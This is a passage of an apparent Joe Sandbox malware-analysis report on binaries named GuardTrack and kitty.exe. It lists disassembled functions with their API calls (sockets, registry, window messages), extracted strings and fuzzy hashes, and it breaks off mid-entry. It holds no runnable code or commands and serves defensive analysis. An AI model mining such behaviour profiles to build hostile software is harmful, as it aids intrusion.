Instruction Fuzzy Hash: A911E370501A36BAEB248F519C98EF7FB6EFF16750F10422AF90542100E3749899DAE0

Function 0061D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0061D180

Strings

0.0.0.0, xrefs: 0061D18E
L,d, xrefs: 0061D12E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,d
API String ID: 856254489-3245245077
Opcode ID: 07fa93e5942d945555ca4fdcfa236fd3c0e0be22ba6e4951765d368638e722d0
Instruction ID: d3078692fbb4bcb88aea1b8640a9df0c50cc07af1d0c8bdf232ef7742867c83a
Opcode Fuzzy Hash: 07fa93e5942d945555ca4fdcfa236fd3c0e0be22ba6e4951765d368638e722d0
Instruction Fuzzy Hash: 0A118235600215AFCB14EE54C982EEAB7B6BF84710F548059F9096B3A2DA30FD82CB65

Function 00628475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0062849D,?,00000000,?,?), ref: 006286F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0
htons.WSOCK32(00000000,?,00000000), ref: 006284DD

Strings

255.255.255.255, xrefs: 006284B8

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 05ed09d56fbaa5e261895d9683e525ffd5348cd0598de7a02f15beb3a3018502
Instruction ID: 2e32de217bc7a3451ee100e3d84d27b103b8e487e2502270a779aa6f86889613
Opcode Fuzzy Hash: 05ed09d56fbaa5e261895d9683e525ffd5348cd0598de7a02f15beb3a3018502
Instruction Fuzzy Hash: 0211E535240226AFDB10EF64DC46FEEB766FF01310F10451AFA11972D2DB71A814CB99

Function 006099BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00609A2B

Strings

ComboBox, xrefs: 006099CA
ListBox, xrefs: 006099F5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b6546b509791629af1c1766ed57540b5fc6cd846c58a4268a03a48de072250fa
Instruction ID: 4123909420a9dba4dac06e330e36d4dbd42caa45ece1daf088ad99e96396af9f
Opcode Fuzzy Hash: b6546b509791629af1c1766ed57540b5fc6cd846c58a4268a03a48de072250fa
Instruction Fuzzy Hash: 4001B571A82125ABCB18EBA4CC55DFF776BFF96360B10061DF862573D2DE315C089660

Function 005BBBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005BBC07

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

_wcscat.LIBCMT ref: 005F3593

Strings

sg, xrefs: 005BBC47

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: sg
API String ID: 257928180-871713362
Opcode ID: a29e69aa9c59c56aea6829181de81587456782aa2c0426acf8928ee2db2ba53d
Instruction ID: e7c3bad915fa76761bfcd04b330fa1c28c1e46fa14c9754e7bc95d000419edf4
Opcode Fuzzy Hash: a29e69aa9c59c56aea6829181de81587456782aa2c0426acf8928ee2db2ba53d
Instruction Fuzzy Hash: 8311083090420A9BCB01EFA48846ECD7FB9FF49350F1044AAB949D7291DFF0AB845B51

Function 0061934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00619367
__fread_nolock.LIBCMT ref: 0061937C

Strings

EA06, xrefs: 006193AE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: d5619dbebed38e83f686ffabab497e561488eab5cdafa5ba2abdc20a8583d848
Instruction ID: 81e0efef56aa63fdc2f32af9f194b2a411663516e05f2cdcbbce29fb5fa612b8
Opcode Fuzzy Hash: d5619dbebed38e83f686ffabab497e561488eab5cdafa5ba2abdc20a8583d848
Instruction Fuzzy Hash: 1F01B972904258BEDB28C6A8C85AEFEBBF89B15301F04429FF552D2281E575A6449760

Function 006098B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00609923

Strings

ComboBox, xrefs: 006098C2
ListBox, xrefs: 006098ED

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 497f904b86719a2bcdb20f757936b5ddbe193170584204b02544cbf21a0923ce
Instruction ID: 88523b7584797fa008d46c0ebea4ce4f04f7be034008fd48ed0cbfa1e2b90760
Opcode Fuzzy Hash: 497f904b86719a2bcdb20f757936b5ddbe193170584204b02544cbf21a0923ce
Instruction Fuzzy Hash: FD01F772A821056BCB18EBE0C956EFF77AFEF52340F14001DB806632D2DA109E0896B5

Function 0060993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 006099A6

Strings

ComboBox, xrefs: 00609947
ListBox, xrefs: 00609972

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1e0891398fff5baa9556b1ad2436f982b7e04a575fdc51b3cdcb7ff98c72d661
Instruction ID: c18a83fc6825ce5e4e507453c030e0929c1fba1292025678ff7b78725fd086b4
Opcode Fuzzy Hash: 1e0891398fff5baa9556b1ad2436f982b7e04a575fdc51b3cdcb7ff98c72d661
Instruction Fuzzy Hash: F401F772A821056ACB14EBE4CA06FFF77AF9F12340F14001DB846732C2DA209E0896B5

Function 005D6D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 005D6DC0
__calloc_crt.LIBCMT ref: 005D6DD9

Strings

@bg, xrefs: 005D6DF0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __calloc_crt
String ID: @bg
API String ID: 3494438863-197568780
Opcode ID: a40029320c744d9f5ae987faa51ae5da1e65b9a324896deb32a58a797e2dd179
Instruction ID: a066ceae503c74f1934efc44770db6ff3a7d6606caa07a94384c28d66bd16f47
Opcode Fuzzy Hash: a40029320c744d9f5ae987faa51ae5da1e65b9a324896deb32a58a797e2dd179
Instruction Fuzzy Hash: 7DF03C713082128FF738AF2CBC016A52FA7F740720B106467F128CA396E7308DC25690

Function 006154E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00615501
_wcscmp.LIBCMT ref: 00615513

Strings

#32770, xrefs: 0061550D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 976b434f0b9b098c091f01b03f1f70f29fa5da1c048cf8b1c8fb9c2b5c1b43b2
Instruction ID: daa4e7003eb3f71b7dbb20829ead8dd428c1097312412f341a08ed1e34449ed2
Opcode Fuzzy Hash: 976b434f0b9b098c091f01b03f1f70f29fa5da1c048cf8b1c8fb9c2b5c1b43b2
Instruction Fuzzy Hash: D7E061725002296BE3209A59AC09FE7FBEDEB45730F001017FD04D3151E5709A4087E1

Function 00608892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006088A0

Part of subcall function 005D3588: _doexit.LIBCMT ref: 005D3592

Strings

AutoIt, xrefs: 00608894
Error allocating memory., xrefs: 00608899

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 82431325fec3935771a938c53c3ea2fc2ef36f4507b216aa5a99e6169e331bd2
Instruction ID: dfd24bc0b79f2417672ee09dfc55490be3f8809dc7b5fa681e41416585f965cf
Opcode Fuzzy Hash: 82431325fec3935771a938c53c3ea2fc2ef36f4507b216aa5a99e6169e331bd2
Instruction Fuzzy Hash: F9D0C23128032836D32432E86C1EFCA2E898B45B51F00442BBB08A52C349E185804196

Function 005F0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 005F0091

Part of subcall function 0062C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,005F027A,?), ref: 0062C6E7
Part of subcall function 0062C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0062C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005F0289

Strings

WIN_XPe, xrefs: 005F00A4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 38b64e382a6deee22c7ad8402a7f2eec78fdbb01e5b95347820518d26b57871f
Instruction ID: a4e4a8fc209cc14234df4437f07ac1b7f3a26745c48b9d41a308d13abe65787d
Opcode Fuzzy Hash: 38b64e382a6deee22c7ad8402a7f2eec78fdbb01e5b95347820518d26b57871f
Instruction Fuzzy Hash: D5F01C70805119DFDB25DBA0C9487EC7ABDBB08300F682485E206A2191CB744F80DF20

Function 005C5800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,zg0zg,00677A2C,00677890,?,005C5A53,00677A2C,00677A30,?,00000004), ref: 005C5823

Strings

,zg0zg, xrefs: 005C5808, 005C5821
SZ\,zg0zg, xrefs: 005C5804

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: DestroyIcon
String ID: ,zg0zg$SZ\,zg0zg
API String ID: 1234817797-241477352
Opcode ID: 8d3c695ae3878da2db7fa1d5a27431494b4ac05c6baeaee8680056a61c6917c1
Instruction ID: d5e7bc635ce61b030b12c2964b82824af38e9aa139c0d23732cdf50b6583fb10
Opcode Fuzzy Hash: 8d3c695ae3878da2db7fa1d5a27431494b4ac05c6baeaee8680056a61c6917c1
Instruction Fuzzy Hash: 13E0C232014206EFE7200FC8D800B96FFE8BF25321F34841AE08056050E3B178E0DB90

Function 00619EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00619EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00619ECC

Strings

aut, xrefs: 00619EC6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 15c9d42e0f03ba80d23fe90e1e5ff89be8831d52088aed2ed8b4cb28cf52c621
Instruction ID: df39f17ff42c5b8f18411db5e18d975b18ac74145c907a0ea89745cf79ea6334
Opcode Fuzzy Hash: 15c9d42e0f03ba80d23fe90e1e5ff89be8831d52088aed2ed8b4cb28cf52c621
Instruction Fuzzy Hash: 8CD05E7954031DBBEB50AB90DC0EFDBBB6DDB04700F0042A1BF58910E2DAB056988B91

Function 00635FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00635FEB
PostMessageW.USER32(00000000), ref: 00635FF2

Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877

Strings

Shell_TrayWnd, xrefs: 00635FE4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0f36a4efdea83228888532494cbdc7f64985cd5dcc415998afadbb619f251719
Instruction ID: 218d9f3f2ce04d579510532dc569824bbc25122aa1587fee071b0add025dee75
Opcode Fuzzy Hash: 0f36a4efdea83228888532494cbdc7f64985cd5dcc415998afadbb619f251719
Instruction Fuzzy Hash: 16D0C936381321FAF768A7709C4BFD6AA16AB46B50F051829B366EA1D0C9F068508698

Function 00635FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00635FAB
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00635FBE

Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877

Strings

Shell_TrayWnd, xrefs: 00635FA4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f42329cf9ba8fad0a066f05f11080331d2275972893d652e84a17621e0da5e10
Instruction ID: 0da580243d7dab594e55cb41ba0fc4838b266af4d582bc9fd4f00dff1d7492f8
Opcode Fuzzy Hash: f42329cf9ba8fad0a066f05f11080331d2275972893d652e84a17621e0da5e10
Instruction Fuzzy Hash: 30D0C936384321FAF768A7709C5BFD6AA16AB42B50F051829B36AAA1D0C9F058508698

Analysis Process: kitty.exePID: 7720, Parent PID: 7580COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	1126
Total number of Limit Nodes:	8

Executed Functions

Function 00CA8C8F Relevance: 26.0, APIs: 4, Strings: 8, Instructions: 5048COMMON

Download Yara Rule

Strings

ctx`9, xrefs: 00CA9471
7<=<I, xrefs: 00CABCE1
wytpj:, xrefs: 00CA98B1
z}7, xrefs: 00CACEC4
fyyq9, xrefs: 00CAA1D1
@FSYM_;, xrefs: 00CADDE1
dszm9, xrefs: 00CA9031
XSZ]A_;, xrefs: 00CAD56B

Memory Dump Source

Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_c90000_kitty.jbxd

Similarity

API ID:
String ID: 7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
API String ID: 0-1094075928
Opcode ID: 7737b15d3dd9858080fa9e3c43c4f0e1faef7e697431d3befd30cbc04179761f
Instruction ID: f31acecdb612db33f24c7c51ce8d1df012424c78284120f9abde855b9c654b02
Opcode Fuzzy Hash: 7737b15d3dd9858080fa9e3c43c4f0e1faef7e697431d3befd30cbc04179761f
Instruction Fuzzy Hash: 16A3C275D116994AEB06DB74CC42BD9F3B8AF66344F14C3A6E805B6562FB306BC2DB00

Function 00C99390 Relevance: 6.1, APIs: 4, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 00C993B9
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 00C993E8
RegCloseKey.ADVAPI32(?), ref: 00C993F5
RegCloseKey.KERNELBASE(?), ref: 00C99416

Memory Dump Source

Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_c90000_kitty.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: 5e862055357e1d6297aa0f6a4f32f7c821143c3453c68f68947c10318a7af6f9
Instruction ID: 919ea4b6b75c71bc0334beb249a34b390155cc6ca35ba56cb65041d37ff48363
Opcode Fuzzy Hash: 5e862055357e1d6297aa0f6a4f32f7c821143c3453c68f68947c10318a7af6f9
Instruction Fuzzy Hash: 51216F74100309AFEF25DF18DC48BBA77B8FB04704F00459CE8568B291D7B1AA59CB91

Function 00CC1887 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00CC18C1

Memory Dump Source

Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_c90000_kitty.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: c1cb810fcd6f1ce0396526dabf6fa8c4536342ae0c8852751a4158884a19fac3
Instruction ID: c8d3254b2ea35c6dfe1b16816535fb282a01f2db15816514e5370393439a6bd1
Opcode Fuzzy Hash: c1cb810fcd6f1ce0396526dabf6fa8c4536342ae0c8852751a4158884a19fac3
Instruction Fuzzy Hash: 1B111571A0420AAFCB05DF59E945E9A7BF4EF49304F0440A9F819AB252D631EA22CB65

Function 00CC9BC8 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

